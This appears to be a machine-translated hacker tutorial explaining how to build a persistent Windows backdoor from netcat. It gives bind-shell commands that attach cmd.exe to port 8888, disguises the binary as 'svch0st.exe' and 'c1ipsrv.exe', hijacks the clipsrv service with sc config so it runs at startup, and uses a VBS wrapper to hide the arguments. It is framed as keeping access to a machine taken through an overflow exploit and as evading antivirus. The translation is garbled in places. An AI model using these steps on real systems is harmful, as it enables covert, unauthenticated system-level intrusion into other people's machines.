Use a military knife to create your own BackDoor-Transfer

As we all know, NC is a powerful and flexible hacker tool. It can be used to do many things, such as telnet client ports. For example, it can rebound back to Shell during intrusion, such as scanning ...... But have you ever thought about creating a service-level backdoor? Many cainiao like me do not know programming yet, and the popular webshells written by others are often killed. Let's create a webshell together with me, no programming knowledge is required.

First, please refer to the inaccessible nc.exe(you can add a shell and SC .exe (this is a small tool for operating services, known as the operational service military knife) to create our own backdoors, the webshell requires that we do not need a strong operation function. We only need to obtain a shell with the system permission when we connect. What can we do with webshell. If you need to rebound the backdoors, you can also do it. If you register a domain name, you can use the NC to rebound, because it is more complicated. We know that NC is the most typical tool for implementing our backdoor functions. Let's take a look at the help of NC. You can see it by entering nc-H in the command line, we mainly use the following parameters:

-E: bind a program and execute it during connection.
-L listening mode
-P specifies the local port on which the NC is to run
-L enhanced listening mode, which listens again when the connection is disconnected

As for other usage, I believe you have understood it very well. What we often used before is

NC-l-E cmd.exe-P 8888 // The listening 8888port is redirected to cmd.exe when a connection is established to bind a shell //

In this way, execute an overflow program such as serveru and bind it to a port 8888 that can get the shell. When we connect via telnet or NC, we can directly obtain a shell. However, after the connection is disconnected, the listening port will be closed, which is one-time and cannot be obtained again. This is of course not suitable for backdoors. Later, we found that the NC parameter l can remain in the listening state and can be connected repeatedly. Use

NC-l-E cmd.exe-P 8888 // It is also bound, but it is enhanced //

This command has already achieved our goal, but we often work in an overflow shell, leaving a backdoor for future access, so how can we ensure that NC can work after machine restart to achieve our backdoor goal? You can put him under the startup items such as run in the registry, but it seems that this is not very good. In some places, anti-virus software has targeted him and it is not very reassuring to put my backdoor there, then I thought about making a service! Started with the system, huh, huh. Let's take a look at how to build a service!

First, we put nc.exe under % SystemRoot %/system32, named svch0st.exe or % SystemRoot %/systemnamed svchost.exe, so that the task manager cannot be seen differently. Then, use scto replace the system service. You only need to modify the corresponding execution region. Then, change the clipsrv.exe service! The command is as follows:

SC config clipsrv start = auto // set the clipsrv.exe service to automatic //
SC config clipsrv binpath = "C:/winnt/system32/svch0st.exe-l-E cmd.exe-P 8888" // set the starting path of the clipsrv.exe service to our NC //
SC start clipsrv // start the clipsrv.exe service //

Hey, but check the results! Look at the display information in the service. I am very conspicuous! No matter, start the service first and then

Netstat-an | find "8888" // search for 8888 in the netstat-An result to see if our program is running //

II. It is indeed opened, but the NC Process is terminated when the service does not respond. This is the Windows service management mechanism. Not very successful. Let's continue our transformation! Prepare is used as our own EXE file, which should always be supported by the service executable file! Required run. vbs, 3. The content in run. vbs is as follows:

Dim sh // define the variable //
Set SH = Createobject ("wscript. Shell" // retrieve wsh object //
Sh. Run "nc-l-E cmd.exe-P 8888", 0 // execute our program and hide the error //

The self-decompressed path is written as % SystemRoot %/system32. In this case, the self-decompressed service program is ready and saved as c1ipsrv.exe (sorry, I still use the 1 and L tricks) and put it under the C:/winnt/system32 directory. Now, modify the specific path of clipsrv to C:/winnt/system32/c1ipsrv.exe. The command is as follows:

SC stop clipsrv // set the clipsrv.exe service to automatic //
SC config clipsrv start = auto
SC config clipsrv binpath = "C:/winnt/system32/c1ipsrv.exe" // set the starting path of the clipsrv.exe service to our NC //
SC start clipsrv // start the clipsrv.exe service //

Now everything is okay, so the details of our program parameters will be blocked, much better than putting the initial parameters directly in the execution file path. Let's experiment. First, Net start clipsrv, then netstat-an | find "8888" to check whether port 8888 is enabled, and finally connect to NC 127.0.0.1 8888 to get shell! 4. Now, let's get started with your own experience. you can do other things. As long as your service program is well done, you can even use the back-to-back NC, I will not write it down.
This article is what I thought of after reading an animation from Han. Later I thought I could change NC into a backdoor, but it still has a lot of defects. After all, it is not programming, because I cannot return information to the service controller, some errors will be left in the log. However, how many people care about these errors? There is also no authentication function, but the port can be customized and unknown is not considered an authentication.